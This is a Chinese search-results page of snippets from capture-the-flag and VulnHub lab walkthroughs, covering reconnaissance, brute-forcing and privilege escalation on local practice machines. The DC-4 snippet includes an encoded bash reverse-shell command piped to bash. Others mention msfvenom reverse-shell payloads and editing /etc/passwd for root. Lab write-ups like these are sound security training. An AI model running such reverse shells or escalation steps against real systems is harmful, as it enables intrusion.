- 综合排序
- 最热优先
- 最新优先
- 来自专栏OneMoreThink的专栏
靶机实战(4):Funbox: Rookie
使用命令sudo -u root nmap 172.16.33.30 -n -Pn -p- --reason -sV -sC -O获得主机开放的端口、提供的服务、使用的组件、组件的版本。
57710编辑于 2024-10-15 - 来自专栏靶机渗透
靶机渗透DC-4
然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。
67830发布于 2020-04-17 - 来自专栏渗透靶机
Vulnhub靶机:Lower4
arp-scan -I eth1 -l -I 指定eth1这个网卡 -l 扫描出全部主机 我们知道靶机的IP地址在192.168.30.51 nmap 192.168.31.51 -A -O -p- - 后使用namp扫描靶机。 开放22,80,113端口。80端口是很标准的Apache2默认页面。突破口在其他地方。 Identification Protocol(身份识别协议)这是啥呀。
32610编辑于 2025-04-26 - 来自专栏渗透靶机
Vulnhub靶机:DC-4
www.vulnhub.com1.在官网搜索你想要的镜像,然后下载【建议下载 (Mirror)版本】2.下载好后解压得到.ova的文件,右击选择VMware进行打开3.在弹出的框中,选择存放的位置,然后点击导入4. arp-scan -I eth1 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.30.5后使用namp扫描靶机。 这次不像之前的靶机这次没有CMS了。不能直接拿CMS的工具扫描了。界面下只有登录框。那就扫一下网页目录吧。我这里使用dirsearch当然也可以用dirb或者是其他的目录扫描工具。
62910编辑于 2025-01-10 - 来自专栏渗透靶机
hackmyvm靶机:p4l4nc4
hackmyvm.eu/1.在官网搜索你想要的镜像,然后下载2.下载好后解压得到.ova的文件,右击选择VMware或者Oracle VirtualBox进行打开3.在弹出的框中,选择存放的位置,然后点击导入4. arp-scan -I eth0 -l-I 指定eth1这个网卡-l 扫描出全部主机我们知道靶机的IP地址在192.168.31.145后使用namp扫描靶机。 /n3gr4后面还跟一个php页面。也是得要扫出来的。m414nj3.php然后就是爆破参数。这里ffuf或者抓包都可以,我就选我熟悉的用了。文件包含漏洞,直接弹shell了。 friendster那就可以登录p4l4nc4这个用户了。用私钥登录就好了。登录上去之后直接跑脚本就好了。可以从/etc/passwd提权。那就直接把密码删了就完了。nano改一下就好了。
76400编辑于 2025-05-18 - 来自专栏/root
vulnhub靶机实战_DC-4
下载 靶机下载链接汇总:https://download.vulnhub.com/ 使用搜索功能,搜索dc类型的靶机即可。 本次实战使用的靶机是:DC-4 系统:Debian 下载链接:https://download.vulnhub.com/dc/DC-4.zip 启动 下载完成后,打开VMware软件,通过左上角文件打开 hosts up) scanned in 1.92 seconds 启动靶机扫描网段 得到靶机IP:192.168.198.132 nmap -sP 192.168.198.0/24 # 结果 .txt # 传输成功 000000 12345 iloveyou 1q2w3e4r5t 1234 靶机 www-data@dc-4:/home/jim/backups$ nc 192.168.198.129 @dc-4:/var/mail$ teehee提权 登录用户后,使用sudo -l 系统提示该用户可以在靶机上使用teehee命令 charles@dc-4:/bin$ sudo -l Matching
60110编辑于 2025-09-28 - 来自专栏吾生也有涯IT也无涯
VulnHub靶机渗透之DC:4
这次的靶机为DC系列第四个靶机,这系列的靶机设计的很不错,每个靶机环境都比较相似,但是每一个靶机都需要不同的技术和技巧,闲话不多说,下载地址:https://download.vulnhub.com/dc /DC-4.zip,感兴趣自行下载。
1.7K30发布于 2019-07-25 - 来自专栏网络安全自修室
DC-4靶机渗透实战
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址:http://www.five86.com/dc-4.html 信息搜集 直接上nmap进行扫描 nmap -sV -A 172.16.0.16 -oN dc.nmap PORT STATE : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( may not run sudo on dc-4. Hope you enjoyed DC-4.
1.3K40发布于 2020-07-22 - 来自专栏红队蓝军
Vulnhub Funbox4靶机渗透练习
linux-exploit-suggester根据操作系统版本号自动查找相应 提权 脚本的工具 https://github.com/The-Z-Labs/linux-exploit-suggester 将工具下载到靶机中 ,由于靶机上没有wget, curl等工具,可以用upload.php页面来上传文件 下载到kali中 上传les.sh http://192.168.56.106/igmseklhgmrjmtherij2145236 运行les.sh bash les.sh 利用[CVE-2017-16995] 进行提权 通过kali下载45010脚本 45010脚本没有执行的权限 添加权限 chmod 777 funbox4 /funbox4 由于kali的gcc 版本太高,编译出来文件在靶机中无法运行 也可以使用msf进行提权 先使用msfvenom 生成一个linux的反向shell的payload msfvenom
40200编辑于 2025-02-12 - 来自专栏Ms08067安全实验室
【VulnHub系列】DC4(附靶机)
文章来源|MS08067 安全实验室 本文作者:大方子(Ms08067实验室核心成员) 文章最后附靶机下载地址 主机信息 实验过程 主机信息 DC4:192.168.229.136 Kali:192.168.229.135 实验过程 先发现内网存活主机 sudo arp-scan --interface eth0 192.168.229.1/24 然后查看靶机开放的端口 sudo nmap -A -p- -T4 -v AF%86%E7%A0%81 这里我是用的是Wfuzz来进行爆破 # -c :我记得是彩色输出 # -t :设置线程数量 # -w :字典文件 # -hw : 隐藏返回word字数为17的信息,这个靶机如果凭证错误的话 -4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000 To: jim@dc-4 Subject: Holidays 然后执行脚本得到root权限 靶机下载地址:http://www.five86.com/downloads/DC-4.zip
94550编辑于 2022-05-27 - 来自专栏网络安全自修室
简单的DC-4靶机渗透实战
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 靶机下载地址:http://www.five86.com/dc-4.html 信息搜集 直接上nmap进行扫描 nmap -sV -A 172.16.0.16 -oN dc.nmap PORT STATE : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( may not run sudo on dc-4. Hope you enjoyed DC-4.
69920发布于 2021-11-25 - 来自专栏vulnhub DC 1-9
VulnHub DC-4 靶机渗透测试笔记
VulnHub DC-4 靶机渗透测试笔记靶机信息• 靶机名称:DC-4• 靶机来源:VulnHub• 目标:获取 root 权限,找到最终 flag• 难度:⭐⭐⭐☆☆(中等)• 涉及技术:信息收集、 192.168.168.0/24扫描结果• 192.168.168.1 → VM8 网卡• 192.168.168.2 → 网关• 192.168.168.128 → Kali 本机• 192.168.168.130 → 靶机 | base64 -d | bashURL 编码版本: 1 echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx 7.2 查看邮件看一下之前打不开的 mbox:去邮箱里找,之前找到过 exim4 服务:Debian-exim:x:108:112::/var/spool/exim4:/bin/false/var/spool 靶机学习笔记,所有操作均在本地搭建的靶场环境中完成,仅用于学习交流。
21400编辑于 2026-03-06 - 来自专栏网络安全自修室
每周打靶 | Vulnhub-DC4靶机渗透实战
2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第3台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! 计划任务 0x02 信息搜集 扫描目标靶机所开端口 sudo masscan --min-rate=1000 192.168.241.137 -p- 发现仅开启80和22端口 扫描端口服务 nmap - /var/mail$ cat jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local (
79720编辑于 2023-09-02 - 来自专栏靶机实操笔记
Vulnhub靶机实操笔记-LampSecurity-CTF4
摘要 Vulnhub靶机实操笔记-LampSecurity-CTF4 涉及知识内容:SQL注入,SSH连接类型,Sudo内网提权 一、Namp扫描 1、主机存活判断 sudo nmap -sn 192.168.32.0 nmap -sT -sV -O -p22,80,25,631 172.16.200.130 -sT #以TCP协议进行扫描 -sV #服务的版本号 -O #服务器系统 -p #指定端口 4、 cat /etc/crontab #较为常用 cat /etc/cron.d #比较少用 五、靶场下载链接 https://download.vulnhub.com/lampsecurity/ctf4.
64510编辑于 2023-07-02 - 来自专栏渗透云笔记
靶机练习 | DC:2 靶机渗透练习
Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 responded 目标是10.2.2.7 端口扫描 root@ptlab:~# nmap -A -T4 -p- 10.2.2.7 Starting Nmap 7.80 ( https://nmap.org 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6: jerry@DC-2:~$ ls flag4.txt jerry@DC-2:~$ cat flag4.txt Good to see that you've made it this far - but
2.1K20发布于 2019-10-14 - 来自专栏全栈程序员必看
owasp靶机安装_靶机是什么
owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。 1.虚拟机安装 在这里我用的是VMware14,靶机自然也是VM的。 百度云盘传送门【2c4j】 2.owasp靶机下载 下载链接 3.owasp靶机打开 在第二步链接打开之后,将会下载到一个文件 将其解压之后先放着,所放的盘建议有10G以上的内存。 注意看我圈起来的地方,靶机是基于Ubuntu的虚拟机,密码账号都在我圈的地方。 现在点击开启虚拟机就好了。 网络适配器的话就是NAT,为了安全尽量不要用桥接。
1.1K10编辑于 2022-09-21 - 来自专栏靶机复现
blogger靶机
wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag 首先扫描网络获取靶机 192.168.101.50 image.png 访问80端口,看到使用wordpress搭建 image.png 使用wpscan扫描一下无结果 image.png 使用dirb扫一下目录,得到了4个目录
53810编辑于 2022-04-12 - 来自专栏FreeBuf
JIS-CTF靶机+Kioptrix靶机渗透
前言 最近一直在down各种CTF靶机玩,本次分享的2个靶机因较基础,故合并成一篇文章发表,本文章仅为初学者练手学习使用,大神们勿喷,感谢各位大佬! JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。 靶机下载/搭建: 靶机1: https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw ? The 4th flag is : {7845658974123568974185412} username : technawi password : 3vilH@ksor 前面我们看到该靶机开启了SSH 本次仅为完成获取靶机中全部flag为目的。 Kioptrix靶机过程 先获取靶机IP: 192.168.1.138 ? nmap开路: ?
1.2K40发布于 2018-07-30 - 来自专栏闪石星曜CyberSecurity
靶机练习 | DC:2 靶机渗透练习
---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 responded 目标是10.2.2.7 端口扫描 root@ptlab:~# nmap -A -T4 -p- 10.2.2.7 Starting Nmap 7.80 ( https://nmap.org 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6: jerry@DC-2:~$ ls flag4.txt jerry@DC-2:~$ cat flag4.txt Good to see that you've made it this far - but
94120发布于 2019-10-14 - 来自专栏HACK学习
渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵
前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…. 靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com /s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31 实战 1.Blacklight靶机 老规矩nmap开路,个人习惯直接全端口… 通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩!
1.5K20发布于 2019-08-07
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号